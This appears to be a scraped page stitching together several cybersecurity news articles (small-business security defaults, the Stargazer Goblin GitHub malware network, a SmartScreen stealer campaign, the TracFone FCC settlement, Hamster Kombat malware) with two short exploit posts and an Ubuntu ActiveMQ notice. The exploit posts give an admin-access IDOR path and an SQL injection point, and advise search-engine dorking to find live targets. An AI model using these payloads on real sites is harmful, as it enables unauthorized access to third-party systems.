Small businesses are increasingly being targeted by cyberattackers. Why, then, are security features priced at a premium?

Source: Song\_about\_summer via Shutterstock

Small and midsize businesses (SMBs) are more vulnerable to attacks because software companies, cloud service providers, and technology makers either charge for safety features that should be offered at every service tier or fail to offer the features at all.

Earlier this year, at least 165 customers of data-services provider Snowflake were compromised — and one reason was because the firm did not offer a way to easily require all users to enable multifactor authentication (MFA), cybersecurity experts say. And just last year, a nonprofit organization failed to detect an attack because, among other reasons, its Microsoft 365 license level of "E3" did not come with logging features that were available to organizations on the more expensive "E5" plan, incident responders stated at the time.

Software makers and service providers need to offer effective security features as a safety measure to every tier of service and not create a cybersecurity gap between the "cyber poor" and enterprises that can afford extra security, says Kymberlee Price, CEO and co-founder of Zatik, a provider of fractional security expertise targeting smaller businesses.

"If vendors do not change the way they price security, if they don't put seatbelts in the base model, then software liability is inevitable," Price says.

Finding ways to secure the cyber poor — those companies and organizations that cannot afford dedicated cybersecurity professionals or high-priced security systems — has become a critical effort worldwide. In 2023, the US Cybersecurity and Infrastructure Security Agency (CISA) pledged to find ways to help the smallest organizations, which typically do not have budgets for information technology, let alone information security. Security compromises can result in business failures and significant stress-related problems for small-business owners.

Driving security down to the smallest firms is critical to promote security across the business ecosystem, as larger companies count SMBs among their vendors, contractors, and partners, says Saeed Abbasi, product manager of vulnerability research at Qualys.

"Strengthening cybersecurity in SMBs is essential for protecting their assets and safeguarding larger business ecosystems, as these small businesses often serve as links in broader supply chains," he says. "Moreover, proactive cybersecurity costs are typically lower than the potential losses from data breaches."

**Delivering More Security By Default**

Defining the difference between what should be a security product in its own right and what should be a security feature is not easy, Price acknowledges. Single sign-on capabilities, such as Okta, would be obviously considered as a security service, but a feature in another product to connect to Okta's SSO should not require purchasing a higher tier, Price says.

"If there's some completely new innovation that revolutionizes the way security works ... that's going to involve development and other costs," so charging extra for that seems fair, she says. "But at this point, so many of these features \[are the equivalent of\] backup cameras, which were an LX-model option when they first came out, but now they're standard in the base models."

Among the safety features Price says she would like to see: Firms should be given the ability to require and monitor two-factor authentication across the business, single sign-on integration should be a base-tier feature, and role-based access controls that split administration and normal user functions should be standard. In addition, companies should start offering audit trails in every application by default and the ability for an administrator to revoke access to users.

For Snowflake, it was not a matter of charging extra for a MFA but of not enabling a feature that cybersecurity professionals have long advocated for. On the platform, individuals could opt into MFA, but company administrators had no power to require the security for every user in their organizations, said Ofer Maor, co-founder and CTO at threat response firm Mitiga, in an interview last month.

"Snowflake not only does not require MFA, but it also makes it very hard for administrators to enforce this," he said. "Unlike other \[software-as-a-service\] platforms, where an admin of a tenant can require MFA for all users in the tenant, in Snowflake this option is not available. The only way for the admin to attempt to enforce it is by manually reviewing every user in the system to see if they voluntarily enabled MFA and, if not, ask them to do so."

Both Snowflake and Microsoft now offer the requested security features on their platforms. As of July 9, administrators can require MFA by default for Snowflake, and Microsoft changed its policy on the cost of logging last year, following criticism of its licenses.

**Make Cyber Safety Easy, Available in Lowest Tiers**

Because SMBs often do not have their own IT specialist, not to mention a skilled cybersecurity expert, offering easy-to-use basic security is paramount. There needs to be a path to drive security down to every user, says Narayana Pappu, CEO at Zendata, a data security and compliance firm.

"SMBs usually lack security expertise in-house, don't have resources to implement nor maintain a solution, and usually carry security risks that can put them out of business if or when a security incident occurs," he says. "These are great reasons to drive good security down to the SMB level — in a connected ... world, you are only as strong as your weakest link."

While generative artificial intelligence and the latest large-language models could provide some companies more security, the cost may still be prohibitive and rarely are such features offered at the base level.

Instead, cybersecurity and software firms should provide basic, effective security in every product at the base service tier, says Zatik's Price, who stresses that she is not against charging everyone a bit extra to make the feature available. However, all tiers should offer the most effective security measures, she says.

"There's no version of a car that does not include seatbelts on the market today," she says. "Are seatbelts free? No, they're baked into the cost of that car. \[Similarly\], we're not saying that all security should be free and zero cost."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Small Businesses Need Default Security in Products Now

With every new third-party provider and partner, an organization's attack surface grows. How, then, do enterprises use threat intelligence to enhance their third-party risk management efforts?

The network of global supply chains means organizations are more interconnected than ever, which increases the potential for a data breach or other security incidents involving third-party suppliers and partners. Third-party vendors, especially those digitally connected to an organization, significantly increase their attack surface and open exposure to software supply chain risks, vulnerabilities, and malicious or negligent insiders.

According to Cyentia Institute, 98% of organizations have at least one third party that suffered a cybersecurity breach within the previous two years.

Organizations have increased their investments in third-party risk management (TPRM) programs to mitigate these risks. In its "2023 Global Third-Party Risk Management Survey," EY found that 90% of respondents were investing to improve their programs' effectiveness. In a recent Dark Reading report, "Managing Third-Party Risk Through Situational Awareness," experts outline how organizations can use threat intelligence to effectively manage third-party risk.

"Third-party risk management is such a big challenge for CISOs," says Rick Holland, VP CISO at security services provider ReliaQuest.

Experts say that the top drivers for TPRM investments are regulatory demands, increased remote work, and data privacy. Much of that investment is being used for threat intelligence programs. By harnessing threat intelligence from various sources, organizations can comprehensively understand the threat landscape and make informed decisions to manage third-party risks effectively.

Threat intelligence is found in many sources, such as open source intelligence, commercial threat intelligence providers, industry-specific information sharing and analysis centers, and internal security data. As applied to third parties, threat intelligence analysts incrementally add intelligence that could indicate that their third parties are either at risk of attack, under attack, or have recently been attacked. Such indicators include comments on Web forums and marketplaces, leaked data, credentials spilled on the Internet, and more.

Download the report to learn how to get started with threat intelligence. Organizations can better comprehend their threat landscape through such threat intelligence and make better-informed decisions to manage their risks. Learn how to collect and use threat intelligence to help reduce many risks associated with third parties.

**About the Author(s)**

An award winning writer and journalist, for more than 20 years George Hulme has written about business, technology, and IT security topics. He currently freelances for a wide range of publications, and is security blogger at InformationWeek.com.

Fighting Third-Party Risk With Threat Intelligence

Cybersecurity startup Zest Security emerged from stealth with an AI-powered cloud risk resolution platform to reduce time from discovery to remediation.

Source: Peachshutterstock via Shutterstock

Organizations have plenty of tools to identify cloud risks, vulnerabilities, and misconfigurations, but not so much for remediating cloud risks. For most companies, significant collaboration is needed between DevOps and security teams to validate the risk, understand the root cause, and determine the best resolution.

Remediating risk usually involves a series of manual and time-consuming processes. Cybersecurity startup Zest Security wants to change that with its AI-powered platform designed to simplify and automate risk resolution. The platform correlates and pinpoints the root cause of cloud risks to craft resolution paths that eliminate cloud vulnerabilities and misconfigurations that attackers can exploit, Zest said in a statement.

On average, it takes 30 to 60 days to remediate a single cloud security risk, and 80% of resolved risks resurface after remediation, Zest said. The increase in known cloud attacks is directly the result of lack of efficient and effective remediation.

"Zest eliminates the back-and-forth typically required between security and DevOps teams to determine the best path to mitigation and remediation," said Matthew Hurewitz, director of platforms and application security at Best Buy, in a statement. "Zest shows security teams all of their options, so they can quickly and confidently resolve their vulnerabilities."

As part of the launch, Zest Security also raised $5 million in seed funding from Hanaco Ventures, Silvertech Ventures, and several angel investors. The company's co-founders have years of experience in cloud and product security. Uri Aronovici, Zest’s CTO, previously worked at Akamai Technologies and Check Point Software. Prior to founding Zest, Snir Ben Shimol, Zest's CEO, built the global cybersecurity platform and services organization at Varonis. Shimol was also the CSO of Cider Security before it was acquired by Palo Alto Networks.

**About the Author(s)**

Zest Security Aims to Resolve Cloud Risks

The threat group uses its "Stargazers Ghost Network" to star, fork, and watch malicious repos to make them seem legitimate, all to distribute a variety of notorious information-stealers-as-a-service.

Source: Miriam Doerr Martin Frommherz via Shutterstock

A threat actor known as "Stargazer Goblin" has found a new way to leverage GitHub to distribute malware and malicious links to unsuspecting users.

Instead of hosting malware on GitHub and then luring users to inadvertently download an infected code package (by getting them to click on a malicious link in a phishing email, for instance), the new tactic involves convincing victims that malicious repositories are legitimate via a socially engineered influence operation involving thousands of inauthentic accounts.

Researchers from Check Point Research (CPR) who uncovered the operation noted in a report this week that the adversary's end game is running a malware distribution-as-a-service (DaaS) network dubbed Stargazers Ghost Network, currently comprised of more than 3,000 active GitHub accounts.

**A Large Network of Rogue Accounts**

The threat group is using a relatively small number of these accounts to actually distribute the malware and malicious links, and the remaining ones are the inauthentic accounts that are being used to make the rogue repositories appear legitimate. Their tactics for doing so have included using the inauthentic accounts to star, fork, and subscribe to the malicious repos, in order to give them a veneer of innocence.

Starring, which gives the group its name, is a way to bookmark repositories on GitHub to make them easier to find in the future, and also as a way to show appreciation for a particular project. Forking is about creating an identical copy of another GitHub project as a way to propose changes to the project or to build on it for your own purposes; and watching is basically a way of keeping abreast of the latest developments in a project. Just as with applications on mobile app stores, users tend to perceive GitHub projects with more stars, forks, and watchers as being more credible — and trustworthy — than others.

"In the past, malware was hosted on GitHub, though the repositories that hosted malware never suggested that a normal user would land, trust, download, and execute the hosted sample," says Antonis Terefos, a researcher at CPR. "Currently, via the Stargazers Ghost Network, we are experiencing a new era of malware distribution utilizing accounts to act organically by starring \[and\] forking malicious repositories \[to make them appear\] as legitimate to normal users."

**Stargazer Goblin's Distribution-as-a-Service Play**

Since at least August 2022, and likely even earlier, Stargazer Goblin has used its rogue GitHub accounts to distribute a variety of malware families, including Atlantida Stealer, Rhadamanthys infostealer, RisePro, Redline, and Lumma Stealer. A Stargazers Ghost Network advertisement from July 2023 — in English and Russian — that CPR researchers found on a Dark Web forum showed the threat actor charging $10 to "star" a repository with 100 accounts, and $2 to provide an account with an empty "aged" repository, which generally is more trusted than a brand-new one.

CPR also said that the operation likely extends well beyond GitHub.

"We believe that Stargazer Goblin created a universe of Ghost Network accounts operating across various platforms such as GitHub, Twitter, YouTube, Discord, Instagram, Facebook, and many others," CPR said in its report. "Similar to GitHub, other platforms can be utilized to legitimize malicious phishing and distribute links and malware to victims through posts, repositories, videos, tweets, and channels, depending on the features each platform offers."

Terefos says the majority of repositories on the Stargazers Ghost Network use tags that ensure they surface at the top of GitHub searches when users are looking for something. The threat group has also used services, such as Discord, to promote the malicious repositories as places where users can get game mods, cracked software such as Adobe and VPN software, and free trading, AI, and coin-mining tools.

"Since last week's CrowdStrike event, which threat actors have been trying to take advantage of, we have been monitoring for CrowdStrike 'drive-fixes' repositories, on the Ghost Network. So far, there have been none," Terefos says. "\[But\] this could be an example of how a user could land on a malicious repository by searching on GitHub for how to perform the \[CrowdStrike\] fix. The user would see that the repository has been starred by multiple other accounts, indicating that the provided 'fix/repo' works. Instead, the user is being infected with malware."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

'Stargazer Goblin' Amasses Rogue GitHub Accounts to Spread Malware

The good news: Only organizations far behind on standard Windows patching have anything to worry about.

Source: dennizn via Alamy Stock Photo

A Microsoft Defender SmartScreen vulnerability that was patched in February is still being used in infostealing attacks across the globe.

CVE-2024-21412 — a "high" severity, 8.1 CVSS-scored security bypass bug in SmartScreen — was first disclosed and fixed on Feb. 13. Since then, it has been used in campaigns involving well-known infostealers like Lumma Stealer, Water Hydra, and DarkGate.

Now, five months later, Fortinet has flagged yet another campaign involving two more stealers: Meduza and ACR. Attacks thus far have reached the US, Spain, and Thailand.

Sometimes, organizations take their time updating third-party software. By contrast, "The attackers in this case are taking advantage of software that's native on Microsoft Windows, which would be updated in normal Microsoft patch cycles," notes Aamir Lakhani, global security strategist and researcher at Fortinet. "It's a little unclear and concerning when these vulnerabilities are not patched, because it could indicate there are other Microsoft vulnerabilities that are not being patched as well."

**A CVE-2024-21412 Attack Chain**

If you visit a website, or download a file or program that's known to be unsafe — or is suspicious for any number of other reasons — SmartScreen will step in and present you with that famous blue screen message: "Windows protected your PC." It's a simple, effective way to alert users to potentially dangerous cyber threats.

So consider how useful it would be to an attacker if they could simply disable that notification. This is what CVE-2024-21412 allows them to do.

In the latest campaign identified by Fortinet, the attackers are beating SmartScreen "through the combination of PowerShell trickery and hiding attacks in images and taking advantage of how those images are processed," Lakhani explains.

First, they lure victims with a URL that triggers the download of a shortcut (LNK) file. The LNK downloads an executable with an HTML Application (HTA) script with PowerShell code for retrieving decoy PDF files and malicious code injectors.

One of the injectors is more interesting than the other. After running anti-debugging checks, it downloads a JPG image file, then uses a Windows API to access its pixels and decode its bytes, wherein lies malicious code.

"These types of image-based attacks have been around a long time and, while they aren't as common as other types of attacks we typically observe, we still see them pop up over time because they are quite effective," Lakhani notes. "It's not surprising to see this attack, especially because \[steganography\] detection is often overlooked compared to other attack scenarios."

**Consequences to the Unpatched**

The stealers smuggled in through image files in this case get planted inside of legitimate Windows processes, at which point the gathering and exfiltration of data begins.

The kinds of information they aim for are broad. ACR, for example, steals from dozens of browsers (Google Chrome, Firefox), dozens of crypto wallets (Binance, Ledger Live), messenger apps (Telegram, WhatsApp), password managers (Bitwarden, 1Password), virtual private network (VPN) apps, email clients, file transfer protocol (FTP) clients, and more. 

Only organizations far behind on standard Windows patching have anything to worry about. Clearly, though, those organizations are out there.

"I would understand how individual software updates from smaller companies may be missed, but most organizations have regular Microsoft software patch updates, and this particular vulnerability remains open to attack," Lakhani says. To encourage better patching practices, he adds, "I think in all cases, software vendors need to give users alerts and notifications that critical security patches exist and should be installed when the software is launched or used."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Cyberattackers Exploit Microsoft SmartScreen Bug in Stealer Campaign

Prepay wireless provider TracFone has been slapped on the wrist to the tune of $16 million for insufficient customer data protection

Following three separate data breaches between 2021 and 2023 which exposed the proprietary information (PI) of TracFone Wireless customers, the Federal Communications Commission (FCC) announced that the Verizon-owned company has agreed to pay a $16 million civil penalty to settle the government investigation, and it has made an agreement to improve its application programming interface  (API) security.

TracFone Wireless Inc. is an American prepay wireless service provider wholly owned by Verizon. TracFone services are used by the brands Straight Talk, Total by Verizon Wireless, and Walmart Family Mobile.

The settlement ends an investigation into TracFone’s security practices to uncover whether the breaches were the result of ineffective cybersecurity protocols. The Enforcement Bureau (EB) of the FCC found that cybercriminals gained access to certain TracFone customer information, including PI and customer proprietary network information (CPNI), by exploiting vulnerabilities related to customer-facing APIs.

APIs allow different computer programs or components to communicate with one another. When the security behind the APIs is not secure enough, cybercriminals can abuse them to gather information without authorization.

The FCC media release explains in detail that it is possible to leverage numerous APIs to access customer information from websites. And according to the FCC’s own Enforcement Bureau, that is exactly what happened at TracFone.

In addition to the civil penalty, the FCC secured extra assignments for TracFone in the Consent Decree:

*   TracFone has to deploy a mandated information security program, with novel provisions to reduce API vulnerabilities in ways consistent with widely accepted standards, like those identified by the National Institute of Standards and Technology (NIST) and the Open Worldwide Application Security Project (OWASP).
*   TracFone must improve protection measures against SIM-swapping. SIM swapping (and the very similar port-out fraud) is the unlawful use of someone’s personal information to steal their phone number and swap or transfer it to another device. With this, criminals can intercept calls, messages, and certain multi-factor authentication (MFA) codes.
*   TracFone has to undergo annual assessments—including by independent third parties—of its information security program.
*   Employees and certain third parties are to receive privacy and security awareness training.

The Enforcement Bureau reported to the FCC that:

> “After gaining access to customer information during one of the three breaches, the threat actors completed an undisclosed number of unauthorized port-outs.”

 All this occurs as the FCC has continued a mission against SIM-swapping.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

****Check your exposure****

You can verify whether your information is available online due to data breaches by using the Malwarebytes Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan, and we’ll give you a report. For those whose information was not included, you’ll still likely find other exposures in previous data breaches.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 TracFone will pay $16 million to settle FCC data breach investigation 

Players can only access the game by first joining its Telegram channel, with some going astray in copycat channels with hidden malware.

Source: Science Photo Library via Alamy Stock Photo

Malicious actors are targeting users of a mobile currency game by using fake Android and Windows software that installs spyware and other malware.

Hamster Kombat launched in March and already has more than 250 million users, likely due to the promises of winning TON-based cryptocurrency. The game is for Android users, who can earn in-game currency by completing certain tasks within the game.

To play, users must join the game's Telegram channel, scan a QR code, and then launch a Web app on their device. When users first search for the game's Telegram channel, they are likely to come across other Hamster-branded channels attempting to distribute Android malware. One channel, named "HAMSTER EASY," even distributes Ratel Android spyware as an APK file.

This malware can allow the threat actors to subscribe the victim to different services and hide the notifications so that they remain unaware.

Other fake websites include "hamsterkombat-ua.pro" and "hamsterkombat-win.pro," which redirect visitors to advertisements to generate money instead of the real game. 

On the Windows platform, researchers discovered GitHub repositories that promise its victims Hamster Kombat farm bots and autoclickers but instead deliver cryptors that contain Lumma Stealer, info-stealer malware.

As the game continues to grow in popularity among users, it will continue to attract malicious actors, so users should be wary of being tricked by threat actors and copycat apps and remain vigilant when downloading software.

**About the Author(s)**

Hamster Kombat Players Threatened by Spyware &amp; Infostealers

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

**SIM Wisuda 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 7fed84c74a95aca63927ebf377895e9a07606b145886012809d45f932101a348

Download | Favorite | View

**SIM Wisuda 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : SIM Wisuda v1.0 IDOR Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://academic.uii.ac.id/wisuda/                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /login/apps/?menu=Lulusan[+] https://www/127.0.0.1/wisuda.uika-bogor.ac.id/login/apps/?menu=LulusanGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

SIM Wisuda 1.0 Insecure Direct Object Reference

SLiMS CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : SLiMS CMS v2.0 Sql injection Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://slims.web.id/web/news/slims-competition-plugin-and-template/                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : "index.php?p=show_detail&id=471"<===== inject here[+] https://www/127.0.0.1/libman1blitarschid/index.php?p=show_detail&id=471Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

SLiMS CMS 2.0 SQL Injection

Ubuntu Security Notice 6910-1 - Chess Hazlett discovered that Apache ActiveMQ incorrectly handled certain commands. A remote attacker could possibly use this issue to terminate the program, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS. Peter Stoeckli discovered that Apache ActiveMQ incorrectly handled hostname verification. A remote attacker could possibly use this issue to perform a person-in-the-middle attack. This issue only affected Ubuntu 16.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6910-1  
July 23, 2024

activemq vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Apache ActiveMQ.

Software Description:  
- activemq: Java message broker - server

Details:

Chess Hazlett discovered that Apache ActiveMQ incorrectly handled certain  
commands. A remote attacker could possibly use this issue to terminate  
the program, resulting in a denial of service. This issue only affected  
Ubuntu 16.04 LTS. (CVE-2015-7559)

Peter Stöckli discovered that Apache ActiveMQ incorrectly handled  
hostname verification. A remote attacker could possibly use this issue  
to perform a person-in-the-middle attack. This issue only affected Ubuntu  
16.04 LTS. (CVE-2018-11775)

Jonathan Gallimore and Colm Ó hÉigeartaigh discovered that Apache  
ActiveMQ incorrectly handled authentication in certain functions.  
A remote attacker could possibly use this issue to perform a  
person-in-the-middle attack. This issue only affected Ubuntu 16.04 LTS,  
Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2020-13920)

Gregor Tudan discovered that Apache ActiveMQ incorrectly handled  
LDAP authentication. A remote attacker could possibly use this issue  
to acquire unauthenticated access. This issue only affected Ubuntu 16.04  
LTS, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2021-26117)

It was discovered that Apache ActiveMQ incorrectly handled  
authentication. A remote attacker could possibly use this issue to run  
arbitrary code. (CVE-2022-41678)

It was discovered that Apache ActiveMQ incorrectly handled  
deserialization. A remote attacker could possibly use this issue to run  
arbitrary shell commands. (CVE-2023-46604)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   activemq                        5.16.1-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro  
   libactivemq-java                5.16.1-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   activemq                        5.15.11-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro  
   libactivemq-java                5.15.11-1ubuntu0.1~esm1  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   activemq                        5.15.8-2~18.04.1~esm1  
                                   Available with Ubuntu Pro  
   libactivemq-java                5.15.8-2~18.04.1~esm1  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   activemq                        5.13.2+dfsg-2ubuntu0.1~esm1  
                                   Available with Ubuntu Pro  
   libactivemq-java                5.13.2+dfsg-2ubuntu0.1~esm1  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6910-1  
   CVE-2015-7559, CVE-2018-11775, CVE-2020-13920, CVE-2021-26117,  
   CVE-2022-41678, CVE-2023-46604

Tag

#auth